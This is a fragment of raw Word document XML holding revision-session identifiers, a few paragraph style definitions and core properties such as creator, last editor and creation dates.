    <w:rsid w:val="002A5867"/>
    <w:rsid w:val="002C2204"/>
    <w:rsid w:val="002D0D4C"/>
    <w:rsid w:val="002D39E0"/>
    <w:rsid w:val="002E1C84"/>
    <w:rsid w:val="002E5259"/>
    <w:rsid w:val="002E6068"/>
    <w:rsid w:val="002F2092"/>
    <w:rsid w:val="002F24A0"/>
    <w:rsid w:val="002F32B7"/>
    <w:rsid w:val="002F33D4"/>
    <w:rsid w:val="002F4F4C"/>
    <w:rsid w:val="002F5711"/>
    <w:rsid w:val="00302A3C"/>
    <w:rsid w:val="00302D0E"/>
    <w:rsid w:val="0031649D"/>
    <w:rsid w:val="0032098E"/>
    <w:rsid w:val="00325237"/>
    <w:rsid w:val="003265F2"/>
    <w:rsid w:val="00332B0E"/>
    <w:rsid w:val="00334AEE"/>
    <w:rsid w:val="00336ABC"/>
    <w:rsid w:val="00346854"/>
    <w:rsid w:val="00352BD0"/>
    <w:rsid w:val="00355123"/>
    <w:rsid w:val="003604ED"/>
    <w:rsid w:val="00360978"/>
    <w:rsid w:val="00370266"/>
    <w:rsid w:val="003715B1"/>
    <w:rsid w:val="00386087"/>
    <w:rsid w:val="003870DE"/>
    <w:rsid w:val="00393641"/>
    <w:rsid w:val="00395A3B"/>
    <w:rsid w:val="00396614"/>
    <w:rsid w:val="003A3A18"/>
    <w:rsid w:val="003B332A"/>
    <w:rsid w:val="003B3D30"/>
    <w:rsid w:val="003B4AC2"/>
    <w:rsid w:val="003C02F2"/>
    <w:rsid w:val="003C0F4E"/>
    <w:rsid w:val="003C2E9E"/>
    <w:rsid w:val="003D0C35"/>
    <w:rsid w:val="003D0E56"/>
    <w:rsid w:val="003D3676"/>
    <w:rsid w:val="003D7ECE"/>
    <w:rsid w:val="003E0115"/>
    <w:rsid w:val="003E5D8C"/>
    <w:rsid w:val="003F5C8A"/>
    <w:rsid w:val="004013A1"/>
    <w:rsid w:val="004026BB"/>
    <w:rsid w:val="00403F8A"/>
    <w:rsid w:val="00404448"/>
    <w:rsid w:val="00404F1E"/>
    <w:rsid w:val="00410E49"/>
    <w:rsid w:val="00411F00"/>
    <w:rsid w:val="00413385"/>
    <w:rsid w:val="00417837"/>
    <w:rsid w:val="0042624B"/>
    <w:rsid w:val="00434F6D"/>
    <w:rsid w:val="004352F1"/>
    <w:rsid w:val="00436547"/>
    <w:rsid w:val="004369B0"/>
    <w:rsid w:val="004470AC"/>
    <w:rsid w:val="00450096"/>
    <w:rsid w:val="00454D8D"/>
    <w:rsid w:val="00455F6C"/>
    <w:rsid w:val="00457F5D"/>
    <w:rsid w:val="004626C5"/>
    <w:rsid w:val="004628FA"/>
    <w:rsid w:val="004705EB"/>
    <w:rsid w:val="004848C7"/>
    <w:rsid w:val="00485036"/>
    <w:rsid w:val="0049745C"/>
    <w:rsid w:val="004A2D0A"/>
    <w:rsid w:val="004A46FC"/>
    <w:rsid w:val="004B17CD"/>
    <w:rsid w:val="004B3953"/>
    <w:rsid w:val="004B5E23"/>
    <w:rsid w:val="004B6361"/>
    <w:rsid w:val="004B776D"/>
    <w:rsid w:val="004B7F63"/>
    <w:rsid w:val="004C24AC"/>
    <w:rsid w:val="004C6DA0"/>
    <w:rsid w:val="004C75F9"/>
    <w:rsid w:val="004C7EA6"/>
    <w:rsid w:val="004D03B3"/>
    <w:rsid w:val="004D7A1F"/>
    <w:rsid w:val="004E018E"/>
    <w:rsid w:val="004E4C2C"/>
    <w:rsid w:val="004E657D"/>
    <w:rsid w:val="004F2FBD"/>
    <w:rsid w:val="004F69BF"/>
    <w:rsid w:val="004F6D23"/>
    <w:rsid w:val="004F73AD"/>
    <w:rsid w:val="00500EE8"/>
    <w:rsid w:val="0050136A"/>
    <w:rsid w:val="00501F66"/>
    <w:rsid w:val="005109AD"/>
    <w:rsid w:val="00514C03"/>
    <w:rsid w:val="005243C7"/>
    <w:rsid w:val="00524497"/>
    <w:rsid w:val="00527847"/>
    <w:rsid w:val="00532C24"/>
    <w:rsid w:val="00536AE2"/>
    <w:rsid w:val="005423B0"/>
    <w:rsid w:val="00543B10"/>
    <w:rsid w:val="00550A8F"/>
    <w:rsid w:val="00557034"/>
    <w:rsid w:val="00557694"/>
    <w:rsid w:val="005724D2"/>
    <w:rsid w:val="00577276"/>
    <w:rsid w:val="0058064C"/>
    <w:rsid w:val="005837EF"/>
    <w:rsid w:val="0058466E"/>
    <w:rsid w:val="0059384C"/>
    <w:rsid w:val="005A5A51"/>
    <w:rsid w:val="005B0411"/>
    <w:rsid w:val="005B1D09"/>
    <w:rsid w:val="005C03C8"/>
    <w:rsid w:val="005C056A"/>
    <w:rsid w:val="005D49C8"/>
    <w:rsid w:val="005D6C21"/>
    <w:rsid w:val="005E099F"/>
    <w:rsid w:val="005E2377"/>
    <w:rsid w:val="005E5C97"/>
    <w:rsid w:val="005E62A2"/>
    <w:rsid w:val="005F2140"/>
    <w:rsid w:val="005F32BA"/>
    <w:rsid w:val="005F64B6"/>
    <w:rsid w:val="006031B0"/>
    <w:rsid w:val="00603268"/>
    <w:rsid w:val="006058DC"/>
    <w:rsid w:val="00611730"/>
    <w:rsid w:val="00612EEE"/>
    <w:rsid w:val="006203B4"/>
    <w:rsid w:val="0062170E"/>
    <w:rsid w:val="006262FB"/>
    <w:rsid w:val="00630061"/>
    <w:rsid w:val="006300CE"/>
    <w:rsid w:val="00630A63"/>
    <w:rsid w:val="00631633"/>
    <w:rsid w:val="006321D7"/>
    <w:rsid w:val="00655E1D"/>
    <w:rsid w:val="006609E2"/>
    <w:rsid w:val="006630C4"/>
    <w:rsid w:val="00667A80"/>
    <w:rsid w:val="00676416"/>
    <w:rsid w:val="00683E77"/>
    <w:rsid w:val="00693A9B"/>
    <w:rsid w:val="00696A4C"/>
    <w:rsid w:val="00696DD8"/>
    <w:rsid w:val="00697D82"/>
    <w:rsid w:val="006A17F7"/>
    <w:rsid w:val="006A5E58"/>
    <w:rsid w:val="006B1279"/>
    <w:rsid w:val="006C08E1"/>
    <w:rsid w:val="006C7242"/>
    <w:rsid w:val="006C7B2A"/>
    <w:rsid w:val="006D10F5"/>
    <w:rsid w:val="006D13F7"/>
    <w:rsid w:val="006D6B36"/>
    <w:rsid w:val="006E3F4D"/>
    <w:rsid w:val="006E43B4"/>
    <w:rsid w:val="006E5E0F"/>
    <w:rsid w:val="006E68CB"/>
    <w:rsid w:val="006F0A12"/>
    <w:rsid w:val="006F4437"/>
    <w:rsid w:val="006F714E"/>
    <w:rsid w:val="006F7A9F"/>
    <w:rsid w:val="007000A2"/>
    <w:rsid w:val="007078FD"/>
    <w:rsid w:val="00711907"/>
    <w:rsid w:val="00716207"/>
    <w:rsid w:val="0072148F"/>
    <w:rsid w:val="00724B53"/>
    <w:rsid w:val="00725FA1"/>
    <w:rsid w:val="00732975"/>
    <w:rsid w:val="0074398A"/>
    <w:rsid w:val="0074442F"/>
    <w:rsid w:val="00753238"/>
    <w:rsid w:val="00762863"/>
    <w:rsid w:val="007633A8"/>
    <w:rsid w:val="00775B5A"/>
    <w:rsid w:val="007770CB"/>
    <w:rsid w:val="0078289D"/>
    <w:rsid w:val="00783542"/>
    <w:rsid w:val="0078587B"/>
    <w:rsid w:val="00791993"/>
    <w:rsid w:val="00791F01"/>
    <w:rsid w:val="007A05B1"/>
    <w:rsid w:val="007A10CF"/>
    <w:rsid w:val="007A6054"/>
    <w:rsid w:val="007B56F4"/>
    <w:rsid w:val="007C07C8"/>
    <w:rsid w:val="007D09AC"/>
    <w:rsid w:val="007D2DAF"/>
    <w:rsid w:val="007D763A"/>
    <w:rsid w:val="007D7DC6"/>
    <w:rsid w:val="007D7EDB"/>
    <w:rsid w:val="007E7A8F"/>
    <w:rsid w:val="007F688A"/>
    <w:rsid w:val="00801796"/>
    <w:rsid w:val="0080419D"/>
    <w:rsid w:val="008106AE"/>
    <w:rsid w:val="00814C7C"/>
    <w:rsid w:val="00820211"/>
    <w:rsid w:val="0082281A"/>
    <w:rsid w:val="008272F4"/>
    <w:rsid w:val="00832413"/>
    <w:rsid w:val="00837D38"/>
    <w:rsid w:val="00842DEF"/>
    <w:rsid w:val="00847666"/>
    <w:rsid w:val="0085094A"/>
    <w:rsid w:val="00853C9D"/>
    <w:rsid w:val="00853DF9"/>
    <w:rsid w:val="00860332"/>
    <w:rsid w:val="008619FC"/>
    <w:rsid w:val="008710F2"/>
    <w:rsid w:val="00871CB5"/>
    <w:rsid w:val="00874B0E"/>
    <w:rsid w:val="008838F3"/>
    <w:rsid w:val="008B3146"/>
    <w:rsid w:val="008B4C03"/>
    <w:rsid w:val="008B7A14"/>
    <w:rsid w:val="008C04CE"/>
    <w:rsid w:val="008C059C"/>
    <w:rsid w:val="008C386F"/>
    <w:rsid w:val="008C7D8C"/>
    <w:rsid w:val="008D0A4E"/>
    <w:rsid w:val="008D60A7"/>
    <w:rsid w:val="008D668E"/>
    <w:rsid w:val="008E4BF9"/>
    <w:rsid w:val="008E52DC"/>
    <w:rsid w:val="008E595B"/>
    <w:rsid w:val="008E5BAE"/>
    <w:rsid w:val="008E69A0"/>
    <w:rsid w:val="008E6C8A"/>
    <w:rsid w:val="008F0376"/>
    <w:rsid w:val="008F1BBE"/>
    <w:rsid w:val="008F28BD"/>
    <w:rsid w:val="008F660C"/>
    <w:rsid w:val="008F6B73"/>
    <w:rsid w:val="008F7892"/>
    <w:rsid w:val="009028F6"/>
    <w:rsid w:val="009078D9"/>
    <w:rsid w:val="009124BE"/>
    <w:rsid w:val="00913A36"/>
    <w:rsid w:val="00925D8E"/>
    <w:rsid w:val="00927DE7"/>
    <w:rsid w:val="00937101"/>
    <w:rsid w:val="00943C47"/>
    <w:rsid w:val="0094636A"/>
    <w:rsid w:val="00947BD0"/>
    <w:rsid w:val="00951F66"/>
    <w:rsid w:val="009523B8"/>
    <w:rsid w:val="00953098"/>
    <w:rsid w:val="0096094E"/>
    <w:rsid w:val="00970101"/>
    <w:rsid w:val="009724CE"/>
    <w:rsid w:val="00975EC0"/>
    <w:rsid w:val="00976491"/>
    <w:rsid w:val="00980F87"/>
    <w:rsid w:val="00982370"/>
    <w:rsid w:val="009857D7"/>
    <w:rsid w:val="009A5EDE"/>
    <w:rsid w:val="009B5BA3"/>
    <w:rsid w:val="009B74DD"/>
    <w:rsid w:val="009C1AAB"/>
    <w:rsid w:val="009C1D04"/>
    <w:rsid w:val="009C71F6"/>
    <w:rsid w:val="009D1C95"/>
    <w:rsid w:val="009D7C46"/>
    <w:rsid w:val="009E3EB3"/>
    <w:rsid w:val="009E5694"/>
    <w:rsid w:val="009F53EA"/>
    <w:rsid w:val="009F57BA"/>
    <w:rsid w:val="009F5948"/>
    <w:rsid w:val="009F6A79"/>
    <w:rsid w:val="00A071ED"/>
    <w:rsid w:val="00A233F2"/>
    <w:rsid w:val="00A33E87"/>
    <w:rsid w:val="00A420BF"/>
    <w:rsid w:val="00A53ADB"/>
    <w:rsid w:val="00A563D5"/>
    <w:rsid w:val="00A60BB0"/>
    <w:rsid w:val="00A61BB3"/>
    <w:rsid w:val="00A64002"/>
    <w:rsid w:val="00A65ACC"/>
    <w:rsid w:val="00A66052"/>
    <w:rsid w:val="00A71E37"/>
    <w:rsid w:val="00A76B6F"/>
    <w:rsid w:val="00A77751"/>
    <w:rsid w:val="00A829C2"/>
    <w:rsid w:val="00A91A2C"/>
    <w:rsid w:val="00A92F80"/>
    <w:rsid w:val="00A95198"/>
    <w:rsid w:val="00AB1ABA"/>
    <w:rsid w:val="00AC1622"/>
    <w:rsid w:val="00AC1D09"/>
    <w:rsid w:val="00AC424D"/>
    <w:rsid w:val="00AC5701"/>
    <w:rsid w:val="00AC73E7"/>
    <w:rsid w:val="00AD380C"/>
    <w:rsid w:val="00AD6EA6"/>
    <w:rsid w:val="00AE3EF2"/>
    <w:rsid w:val="00AE4545"/>
    <w:rsid w:val="00AE5A5B"/>
    <w:rsid w:val="00AE7B5A"/>
    <w:rsid w:val="00B02C78"/>
    <w:rsid w:val="00B03FED"/>
    <w:rsid w:val="00B2072E"/>
    <w:rsid w:val="00B20D3C"/>
    <w:rsid w:val="00B22786"/>
    <w:rsid w:val="00B322A2"/>
    <w:rsid w:val="00B363AE"/>
    <w:rsid w:val="00B4021B"/>
    <w:rsid w:val="00B4251F"/>
    <w:rsid w:val="00B46A0A"/>
    <w:rsid w:val="00B46C2C"/>
    <w:rsid w:val="00B46EE9"/>
    <w:rsid w:val="00B61376"/>
    <w:rsid w:val="00B634C6"/>
    <w:rsid w:val="00B7282D"/>
    <w:rsid w:val="00B74536"/>
    <w:rsid w:val="00B74F64"/>
    <w:rsid w:val="00B9448B"/>
    <w:rsid w:val="00B950C6"/>
    <w:rsid w:val="00BA21D8"/>
    <w:rsid w:val="00BA24DB"/>
    <w:rsid w:val="00BA3E2D"/>
    <w:rsid w:val="00BA477F"/>
    <w:rsid w:val="00BA503D"/>
    <w:rsid w:val="00BB41F0"/>
    <w:rsid w:val="00BB4BDC"/>
    <w:rsid w:val="00BB4C28"/>
    <w:rsid w:val="00BD0C5C"/>
    <w:rsid w:val="00BD2837"/>
    <w:rsid w:val="00BD2F2E"/>
    <w:rsid w:val="00BD50A5"/>
    <w:rsid w:val="00BD70CA"/>
    <w:rsid w:val="00BD7A06"/>
    <w:rsid w:val="00BE3389"/>
    <w:rsid w:val="00BE4BAC"/>
    <w:rsid w:val="00BF2828"/>
    <w:rsid w:val="00C03538"/>
    <w:rsid w:val="00C055AD"/>
    <w:rsid w:val="00C14391"/>
    <w:rsid w:val="00C150F5"/>
    <w:rsid w:val="00C220EE"/>
    <w:rsid w:val="00C24F96"/>
    <w:rsid w:val="00C26CD7"/>
    <w:rsid w:val="00C274B4"/>
    <w:rsid w:val="00C338DF"/>
    <w:rsid w:val="00C40CD3"/>
    <w:rsid w:val="00C41202"/>
    <w:rsid w:val="00C4224E"/>
    <w:rsid w:val="00C46EE9"/>
    <w:rsid w:val="00C47DDB"/>
    <w:rsid w:val="00C5213B"/>
    <w:rsid w:val="00C52D0D"/>
    <w:rsid w:val="00C55752"/>
    <w:rsid w:val="00C60560"/>
    <w:rsid w:val="00C62378"/>
    <w:rsid w:val="00C65FDB"/>
    <w:rsid w:val="00C7126D"/>
    <w:rsid w:val="00C80743"/>
    <w:rsid w:val="00C82B15"/>
    <w:rsid w:val="00C8480B"/>
    <w:rsid w:val="00C8509D"/>
    <w:rsid w:val="00C864D9"/>
    <w:rsid w:val="00C95A55"/>
    <w:rsid w:val="00C97EE7"/>
    <w:rsid w:val="00CA4FFF"/>
    <w:rsid w:val="00CB0AC4"/>
    <w:rsid w:val="00CB13D0"/>
    <w:rsid w:val="00CB3300"/>
    <w:rsid w:val="00CC58C9"/>
    <w:rsid w:val="00CC7FC5"/>
    <w:rsid w:val="00CD0C89"/>
    <w:rsid w:val="00CD3264"/>
    <w:rsid w:val="00CD4BFD"/>
    <w:rsid w:val="00CE381D"/>
    <w:rsid w:val="00CE4488"/>
    <w:rsid w:val="00CF182E"/>
    <w:rsid w:val="00CF2039"/>
    <w:rsid w:val="00CF42E9"/>
    <w:rsid w:val="00D03805"/>
    <w:rsid w:val="00D0570F"/>
    <w:rsid w:val="00D058F2"/>
    <w:rsid w:val="00D1108C"/>
    <w:rsid w:val="00D12EA8"/>
    <w:rsid w:val="00D160FD"/>
    <w:rsid w:val="00D17093"/>
    <w:rsid w:val="00D176A0"/>
    <w:rsid w:val="00D20872"/>
    <w:rsid w:val="00D242B9"/>
    <w:rsid w:val="00D26345"/>
    <w:rsid w:val="00D26823"/>
    <w:rsid w:val="00D3180D"/>
    <w:rsid w:val="00D3449B"/>
    <w:rsid w:val="00D37EE3"/>
    <w:rsid w:val="00D46AE6"/>
    <w:rsid w:val="00D55C1E"/>
    <w:rsid w:val="00D601F3"/>
    <w:rsid w:val="00D61F00"/>
    <w:rsid w:val="00D65742"/>
    <w:rsid w:val="00D65B1A"/>
    <w:rsid w:val="00D65B54"/>
    <w:rsid w:val="00D702F4"/>
    <w:rsid w:val="00D744CE"/>
    <w:rsid w:val="00D7589D"/>
    <w:rsid w:val="00D75B7A"/>
    <w:rsid w:val="00D82B89"/>
    <w:rsid w:val="00D93184"/>
    <w:rsid w:val="00D95E6C"/>
    <w:rsid w:val="00D97A83"/>
    <w:rsid w:val="00DA4383"/>
    <w:rsid w:val="00DA4C22"/>
    <w:rsid w:val="00DB301B"/>
    <w:rsid w:val="00DB3F00"/>
    <w:rsid w:val="00DC04E8"/>
    <w:rsid w:val="00DC2967"/>
    <w:rsid w:val="00DC3847"/>
    <w:rsid w:val="00DD0AEF"/>
    <w:rsid w:val="00DD64D2"/>
    <w:rsid w:val="00DE2DC2"/>
    <w:rsid w:val="00DE3003"/>
    <w:rsid w:val="00DE4CC2"/>
    <w:rsid w:val="00DF0546"/>
    <w:rsid w:val="00DF068B"/>
    <w:rsid w:val="00DF78D2"/>
    <w:rsid w:val="00E04DB0"/>
    <w:rsid w:val="00E07202"/>
    <w:rsid w:val="00E118DC"/>
    <w:rsid w:val="00E13031"/>
    <w:rsid w:val="00E162D3"/>
    <w:rsid w:val="00E2337C"/>
    <w:rsid w:val="00E259E0"/>
    <w:rsid w:val="00E41487"/>
    <w:rsid w:val="00E4192C"/>
    <w:rsid w:val="00E45B9E"/>
    <w:rsid w:val="00E464C7"/>
    <w:rsid w:val="00E464E4"/>
    <w:rsid w:val="00E54A20"/>
    <w:rsid w:val="00E56837"/>
    <w:rsid w:val="00E61D68"/>
    <w:rsid w:val="00E61E87"/>
    <w:rsid w:val="00E631AC"/>
    <w:rsid w:val="00E63FF9"/>
    <w:rsid w:val="00E65F54"/>
    <w:rsid w:val="00E66755"/>
    <w:rsid w:val="00E73A34"/>
    <w:rsid w:val="00E749B9"/>
    <w:rsid w:val="00E76521"/>
    <w:rsid w:val="00E820A5"/>
    <w:rsid w:val="00EA55A6"/>
    <w:rsid w:val="00EA5D8C"/>
    <w:rsid w:val="00EB0F88"/>
    <w:rsid w:val="00EB789D"/>
    <w:rsid w:val="00EC4676"/>
    <w:rsid w:val="00EC5F94"/>
    <w:rsid w:val="00EE0680"/>
    <w:rsid w:val="00EE0783"/>
    <w:rsid w:val="00EE2FE1"/>
    <w:rsid w:val="00EE6312"/>
    <w:rsid w:val="00EF4BC1"/>
    <w:rsid w:val="00F02A2F"/>
    <w:rsid w:val="00F04AD0"/>
    <w:rsid w:val="00F21CD3"/>
    <w:rsid w:val="00F22209"/>
    <w:rsid w:val="00F2774E"/>
    <w:rsid w:val="00F321DB"/>
    <w:rsid w:val="00F341CD"/>
    <w:rsid w:val="00F41048"/>
    <w:rsid w:val="00F46BDC"/>
    <w:rsid w:val="00F50007"/>
    <w:rsid w:val="00F559C6"/>
    <w:rsid w:val="00F6128B"/>
    <w:rsid w:val="00F72AD7"/>
    <w:rsid w:val="00F753FA"/>
    <w:rsid w:val="00F76601"/>
    <w:rsid w:val="00F76915"/>
    <w:rsid w:val="00F84987"/>
    <w:rsid w:val="00F84B43"/>
    <w:rsid w:val="00F91EA5"/>
    <w:rsid w:val="00F93235"/>
    <w:rsid w:val="00FA2782"/>
    <w:rsid w:val="00FA2A88"/>
    <w:rsid w:val="00FA68C8"/>
    <w:rsid w:val="00FA7E66"/>
    <w:rsid w:val="00FB4E75"/>
    <w:rsid w:val="00FB650B"/>
    <w:rsid w:val="00FC27F1"/>
    <w:rsid w:val="00FC7E8D"/>
    <w:rsid w:val="00FD1601"/>
    <w:rsid w:val="00FD4D78"/>
    <w:rsid w:val="00FE3B90"/>
    <w:rsid w:val="00FE4F45"/>
    <w:rsid w:val="00FF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B3D49"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C53D7A3C-040E-C142-A859-2BCFFFFE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F64"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B74F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F64"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00B74F64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4F64"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00F34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Lingwei Chen</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Zhang, Junjie</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <cp:lastPrinted>2021-10-06T01:48:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-01-25T12:52:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-01-25T12:52:00Z</dcterms:modified>
</cp:coreProperties>
</file>